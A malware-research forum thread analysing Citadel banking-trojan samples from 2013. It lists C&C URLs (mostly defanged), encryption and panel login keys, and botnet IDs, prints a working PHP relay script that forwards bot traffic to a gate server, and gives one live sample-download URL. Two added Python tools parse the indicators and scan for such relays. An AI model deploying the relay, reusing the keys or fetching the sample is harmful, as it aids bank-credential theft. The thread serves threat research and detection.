Citadel (Zeus clone)

Forum for analysis and discussion about malware.
Xylitol
Global Moderator
Posts: 1684
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society

Fri Jul 12, 2013 11:53 am

Version 1.3.5.1 targeting wellsfargo.com

Code:

Drop: hxtp://173.192.210.79/KEAGAN/BBA/gate.php
Update: hxtp://173.192.210.79/KEAGAN/BBA/file.php|file=soft.exe
Key: B5 45 6D 50 7D 87 0E 24 F7 55 60 7C 47 4C 15 E5
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
C&C

Code:

hxtp://173.192.210.79/KEAGAN/BBA/install/
hxtp://173.192.210.79/KEAGAN/BBA/my.php?m=login
hxtp://173.192.210.79/KEAGAN/BBA/_lk3/files/CIT/
exe, plugin, config and decoded in attach
https://www.virustotal.com/en/file/0f3c ... 373629965/

Solving the last interesting old sample in this thread; the rest are .zip without config.
Xylitol wrote: Fun

Code:

00420CD8  |.  68 C0194000   PUSH 4019C0                              ; |Text = "Coded by BRIAN KREBS for personal use only. I love my job & wife."
two more C&C

Code:

hxxp://inbani.com/js/res/cp.php?m=login
hxxp://inbani.com/js/res/theme/images/citadel.jpg
--
hxxp://lotosmusicfm.net/jstat/cp.php
hxxp://lotosmusicfm.net/jstat/theme/images/citadel.jpg
https://www.virustotal.com/file/6f6b5fe ... 338035569/
Citadel v1.3.4.0 targeting a lot of banks (chase, bank of america, capital one, pnc, american express...) and some German banks.

Code:

Drop: hxtp://metaxserv93.in/webstat79/info.php
Update: hxtp://metaxserv15.in/webstat79/file.php|file=volumeup.exe
Key: 62 86 90 BE 08 CB B0 C4 B5 25 0B 39 4D 82 65 02
Login key: 79B194D261FBD4BE3591802621C7E08E
Xylitol

Thu Jul 25, 2013 2:03 pm

Citadel 1.3.5.1 targeting french banks

Code:

Drop: hxtp://madlion.sc/lion/file.php
Config: hxtp://madlion.sc/lion/file.php|file=cobra.exe
Panel: hxtp://madlion.sc/lion/control.php?m=login
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
I've lost the config file but the decoded version is in attach.
Xylitol

Sat Aug 10, 2013 6:03 pm

Seems Citadel 1.3.5.1 can't grab data anymore on Firefox 23.0
Evilcry
Posts: 135
Joined: Tue Apr 20, 2010 6:10 pm

Sun Aug 11, 2013 6:43 am

Yes, it seems there are problems in the injection / PR_* hooking.
wacked2
Posts: 19
Joined: Sat Dec 17, 2011 3:25 pm

Sun Aug 11, 2013 5:52 pm

It's an easy fix.
The interesting functions have simply been moved from nspr4 to ss3
Xylitol

Mon Aug 12, 2013 2:32 pm

1.3.5.1 targeting CA/UK/DE/USA..

Code:

Drop: hxtp://sellherro.ru/milk/file.php
Panel: hxtp://sellherro.ru/milk/xyz.php?m=login
Key: 73 D8 8F 18 73 71 52 88 38 D1 E5 E1 85 1C 44 6E
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
https://www.virustotal.com/en/file/be0f ... 376317996/
Xylitol

Tue Aug 27, 2013 1:24 pm

1.3.5.1 > https://www.virustotal.com/en/file/8b63 ... 377609564/

Code:

Drop: hxtp://legitvendors.ru/wordpress.php
Config: hxtp://legitvendors.ru/file.php|file=svchosts.exe
Panel: hxtp://legitvendors.ru/visco.php?m=login
Key: 00 5D D0 64 F2 49 51 B0 42 D9 FC 49 C6 EC 38 2E
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Xylitol

Tue Aug 27, 2013 8:33 pm

Citadel 1.3.5.1

Code:

Botnet ID: armani (alfabeta, axlogax, brand_new, haha, LLLLL, logmein, menu, menu2, omega, POS, text_corn, u, update, we_we_we, xyl)
Config: hxtp://symbian-theme.biz/armani/gallery.php|file=ssl_cert.exe
Drop: hxtp://real-life2013.in.ua/armani/buy.php
Key: 4F B8 51 53 B1 02 62 EC F5 02 8F 67 AD 1F 9B 00
Login key: 20038735198F82BC8495A2C1B01A9210

Code:

Botnet ID: carfca (rf)
Config: hxtp://real-newslife.com/carfca/football.php|file=carfca.exe
Drop: hxtp://real-life-tips.com/carfca/basket.php
Key: 94 D3 A2 79 A4 12 23 5D 03 60 52 54 84 06 7C F1
Login key: 20038735198F82BC8495A2C1B01A9210

Code:

Botnet ID: coconut
Config: hxtp://yahoo.com/coconut/footer.php|file=pop.exe
Drop: hxtp://agryasona.org/coconut/header.php
Key: D8 3F 6D 1E AA B2 4E C3 88 83 D1 CC 68 C5 F4 9A
Login key: 20038735198F82BC8495A2C1B01A9210

Code:

Botnet ID: just (justme)
Config: hxtp://evenbegosurous.com/just/norton.php|file=pop.exe
Drop: hxtp://dolimdwe.com/just/ping.php
Key: B1 43 D3 D2 08 CF 08 B4 83 5B 37 C2 7B AF 8F CD
Login key: 20038735198F82BC8495A2C1B01A9210

Code:

Botnet ID: pmserver
Config: hxtp://aquabox.in.ua/pmserver/browse.php|file=pmserver.exe
Drop: hxtp://printing-offices.com/pmserver/get.php
Key: 0F BD ED 17 8A 0F 7C 7D 37 1E 0C 3F 88 26 C3 09
Login key: 20038735198F82BC8495A2C1B01A9210

Code:

Botnet ID: supernew (xxaaxxaaxx, canadas)
Config: hxtp://188.190.100.37/supernew/download.php|file=pop.exe
Drop: hxtp://real-life2013.in.ua/supernew/upload.php
Key: D8 3F 6D 1E AA B2 4E C3 88 83 D1 CC 68 C5 F4 9A
Login key: 20038735198F82BC8495A2C1B01A9210

Code:

Botnet ID: uae (test)
Config: hxtp://geographic-channel.com/uae/viewlogo.php|file=doggy.exe
Drop: hxtp://aquabox.in.ua/uae/ping.php
Key: 92 B0 0C 09 C2 30 1F B4 65 FD 68 8D E1 79 C2 E9
Login key: 20038735198F82BC8495A2C1B01A9210
'POS' indeed, several of these Citadel botnets were pushing Dexter and Alina.
No EXE files, just decoded configs in attach (took the keys from the panels...)
It was on the same server as my story here about Dexter: http://www.xylibox.com/2013/08/point-of ... exter.html

To give you an idea of the botnets: [five screenshots attached to the original post, not reproduced here]
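The posts in this thread all use the same hand-written format (Botnet ID / Drop / Update / Config / Panel / Key / Login key lines with hxtp:// or hxxp:// defanged URLs and a "|file=" suffix naming the payload). As an added example, not code from this thread or from Xylitol, here is a small Python parser that turns such a post into structured indicators: it refangs the URLs, splits off the payload file name, checks that the key is 16 bytes and the login key 32 hex characters, and collects the distinct hosts for blocklist or log matching. The sample input is constructed in the thread's format from values in the "just" and wellsfargo posts above; the field names are my own, not Citadel's terms.

```python
"""Parse Citadel config-dump posts (Botnet ID / Drop / Update / Config / Panel /
Key / Login key lines with defanged hxtp:// URLs) into structured indicators.
Added example; field names are assumptions, not Citadel's own terms."""
import re
from urllib.parse import urlsplit

# Constructed sample in the thread's posting format; the values are copied
# from two of the posts above (botnet "just" and the wellsfargo sample).
SAMPLE_POST = """\
Botnet ID: just (justme)
Config: hxtp://evenbegosurous.com/just/norton.php|file=pop.exe
Drop: hxtp://dolimdwe.com/just/ping.php
Key: B1 43 D3 D2 08 CF 08 B4 83 5B 37 C2 7B AF 8F CD
Login key: 20038735198F82BC8495A2C1B01A9210

Drop: hxtp://173.192.210.79/KEAGAN/BBA/gate.php
Update: hxtp://173.192.210.79/KEAGAN/BBA/file.php|file=soft.exe
Key: B5 45 6D 50 7D 87 0E 24 F7 55 60 7C 47 4C 15 E5
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
"""

URL_LABELS = {"drop", "update", "config", "panel"}
LINE_RE = re.compile(
    r"^\s*(botnet id|drop|update|config|panel|key|login key)\s*:\s*(.+?)\s*$", re.I)
DEFANG_RE = re.compile(r"^h(?:xx|xt)p(s?)://", re.I)


def refang(url):
    """Turn the hxtp:// / hxxp:// defanging back into http:// (or https://)."""
    return DEFANG_RE.sub(lambda m: "http" + m.group(1).lower() + "://", url)


def parse_key(text):
    """'B1 43 ... CD' -> 16 raw bytes; any other length is a transcription error."""
    raw = bytes.fromhex(text.replace(" ", ""))
    if len(raw) != 16:
        raise ValueError("expected 16 key bytes, got %d" % len(raw))
    return raw


def parse_login_key(text):
    """Login keys in these posts are 32 hex characters; normalise to lowercase."""
    t = text.strip().lower()
    if not re.fullmatch(r"[0-9a-f]{32}", t):
        raise ValueError("login key must be 32 hex characters")
    return t


def parse_botnet_id(text):
    """'just (justme)' -> ('just', ['justme']); 'coconut' -> ('coconut', [])."""
    m = re.fullmatch(r"(\S+)\s*(?:\((.*)\))?", text.strip())
    if not m:
        raise ValueError("unparseable botnet id: %r" % text)
    aliases = [a.strip() for a in (m.group(2) or "").split(",") if a.strip()]
    return m.group(1), aliases


def parse_post(text):
    """Split a post into entries; a blank or unlabelled line ends the current entry."""
    entries, cur = [], {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            if cur:
                entries.append(cur)
                cur = {}
            continue
        label, value = m.group(1).lower(), m.group(2)
        if label == "botnet id":
            cur["botnet_id"], cur["aliases"] = parse_botnet_id(value)
        elif label in URL_LABELS:
            url, _, fname = value.partition("|file=")  # "|file=x.exe" names the payload
            cur.setdefault("urls", {})[label] = refang(url)
            if fname:
                cur["file"] = fname
        elif label == "key":
            cur["key"] = parse_key(value)
        else:  # login key
            cur["login_key"] = parse_login_key(value)
    if cur:
        entries.append(cur)
    return entries


def hosts(entries):
    """Distinct hostnames/IPs across every URL field, sorted, for blocklists or log matching."""
    return sorted({urlsplit(u).hostname for e in entries for u in e.get("urls", {}).values()})


if __name__ == "__main__":
    for e in parse_post(SAMPLE_POST):
        print(e.get("botnet_id", "-"), e["urls"], e["key"].hex())
    print(hosts(parse_post(SAMPLE_POST)))
```

Entries without a Botnet ID line (the older posts) simply lack that field; the key checks exist because a mistyped byte in a copied key is the most common way these dumps go stale.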
Xylitol

Sun Sep 01, 2013 2:16 pm

1.3.5.1 almost no triggers:
*wellsfargo.com/*
*facebook.com/*
@*payment.com/*

Code:

Drop: hxtp://www.faw.cl/images/fotos/web/citadelka/gate.php
Update: hxtp://www.faw.cl/images/fotos/web/citadelka/file.php|file=soft.exe
Key: 62 F0 67 D6 3B BC 2D 0F D0 EB 5F 63 2F F4 A4 A4
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Xylitol

Mon Sep 02, 2013 10:53 am

1.3.5.1

Code:

Drop: hxtp://smic.hitc.edu.vn/modules/mod_xsystemx/redir.php
Config: hxtp://darklab.ru/conf/file.php|file=cfg.c
Key: A4 6D 4D 1E 22 49 A4 FE AC A9 E6 55 99 27 E0 0D
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
redir.php:

Code:

<?php
// URL of the original (real) gate server.
$url = "http://gorktser.ru/srv/gate.php";

@error_reporting(0); @set_time_limit(0);

// Connect to the original server.
$url = @parse_url($url);
if(!isset($url['port']))$url['port'] = 80; 
if(($real_server = @fsockopen($url['host'], $url['port'])) === false)die('E1');

// Read the data to forward (the bot's raw POST body).
if(($data = @file_get_contents('php://input')) === false)$data = '';

// Build the request; the bot's real IP is passed on to the gate as ?ip=.
$request  = "POST {$url['path']}?ip=".urlencode($_SERVER['REMOTE_ADDR'])." HTTP/1.0\r\n";
$request .= "Host: {$url['host']}\r\n";

if(!empty($_SERVER['HTTP_USER_AGENT']))$request .= "User-Agent: {$_SERVER['HTTP_USER_AGENT']}\r\n";

//$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Content-Length: ".strlen($data)."\r\n";
$request .= "Connection: Close\r\n";

// Send it.
fwrite($real_server, $request."\r\n".$data);

// Read the response.
$result = '';
while(!feof($real_server))$result .= fread($real_server, 1024);
fclose($real_server);

// Return the response body (everything after the headers) to the bot.
echo substr($result, strpos($result, "\r\n\r\n") + 4);
?>
Sample is also here:

Code:

http://gorktser.ru/srv/files/loft_crptd(1).exe
(same hash)
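The redir.php above is a plain relay: it reads the bot's raw POST body from php://input, opens its own socket to a hard-coded upstream gate, tags the request with the caller's IP and User-Agent, and echoes the reply back. Each of those traits is common in legitimate PHP, but the combination is distinctive, which is useful for a web server operator who wants to find such relay scripts in their own document roots. As an added example, not code from this thread, here is a Python heuristic scanner built on exactly those traits. The signal names, the threshold of four hits and the two embedded PHP samples are my own constructions; the relay sample is modelled on the script above and its upstream URL (upstream.example) is a placeholder.

```python
"""Heuristic scan of PHP source for relay ("redirector") scripts of the kind
posted above: a page that reads the raw POST body from php://input, opens its
own connection to a hard-coded upstream URL, copies the caller's IP and
User-Agent into that request, and echoes the upstream reply back.
Added example; the signal names and threshold are my own choices."""
import os
import re

# Each signal on its own is common in legitimate code; the combination is what
# makes a file look like a C2 gate relay.
SIGNALS = {
    "raw_body":  re.compile(r"php://input"),
    "outbound":  re.compile(r"\b(?:fsockopen|curl_init|stream_socket_client)\s*\("),
    "client_ip": re.compile(r"\$_SERVER\s*\[\s*['\"]REMOTE_ADDR['\"]\s*\]"),
    "ua_copy":   re.compile(r"\$_SERVER\s*\[\s*['\"]HTTP_USER_AGENT['\"]\s*\]"),
    "silenced":  re.compile(r"@?error_reporting\s*\(\s*0\s*\)"),
    "raw_http":  re.compile(r"\bPOST\s+.*?HTTP/1\.[01]"),
}
# A string literal URL assigned to a variable: the relay's upstream target.
UPSTREAM_RE = re.compile(r"\$\w+\s*=\s*[\"'](https?://[^\"']+)[\"']")


def scan_php(source, threshold=4):
    """Return which signals fired, any hard-coded upstream URLs, and a verdict."""
    hits = [name for name, rx in SIGNALS.items() if rx.search(source)]
    return {
        "hits": hits,
        "score": len(hits),
        "upstream": UPSTREAM_RE.findall(source),
        "suspicious": len(hits) >= threshold,
    }


def scan_tree(root, threshold=4):
    """Walk a document root and return the suspicious PHP files (path -> report)."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for f in files:
            if not f.lower().endswith((".php", ".phtml", ".php5")):
                continue
            p = os.path.join(dirpath, f)
            try:
                with open(p, encoding="utf-8", errors="replace") as fh:
                    rep = scan_php(fh.read(), threshold)
            except OSError:
                continue
            if rep["suspicious"]:
                findings[p] = rep
    return findings


# Constructed sample modelled on the relay above; the upstream is a placeholder.
RELAY_SAMPLE = r"""<?php
$url = "http://upstream.example/gate.php";
@error_reporting(0);
$u = @parse_url($url);
$s = @fsockopen($u['host'], 80);
$data = @file_get_contents('php://input');
$req = "POST {$u['path']}?ip=".urlencode($_SERVER['REMOTE_ADDR'])." HTTP/1.0\r\n";
$req .= "Host: {$u['host']}\r\nUser-Agent: {$_SERVER['HTTP_USER_AGENT']}\r\n";
$req .= "Content-Length: ".strlen($data)."\r\nConnection: Close\r\n";
fwrite($s, $req."\r\n".$data);
echo stream_get_contents($s);
?>"""

# Constructed benign page for comparison.
BENIGN_SAMPLE = r"""<?php
$name = htmlspecialchars($_GET['name'] ?? 'world');
echo "<p>Hello, $name</p>";
?>"""


if __name__ == "__main__":
    for label, src in (("relay", RELAY_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, scan_php(src))
```

Run scan_tree("/var/www") (or whatever the document root is) to list files that trip the threshold; the "upstream" field of each report is the first thing to check, since a legitimate proxy will point somewhere the site owner recognises.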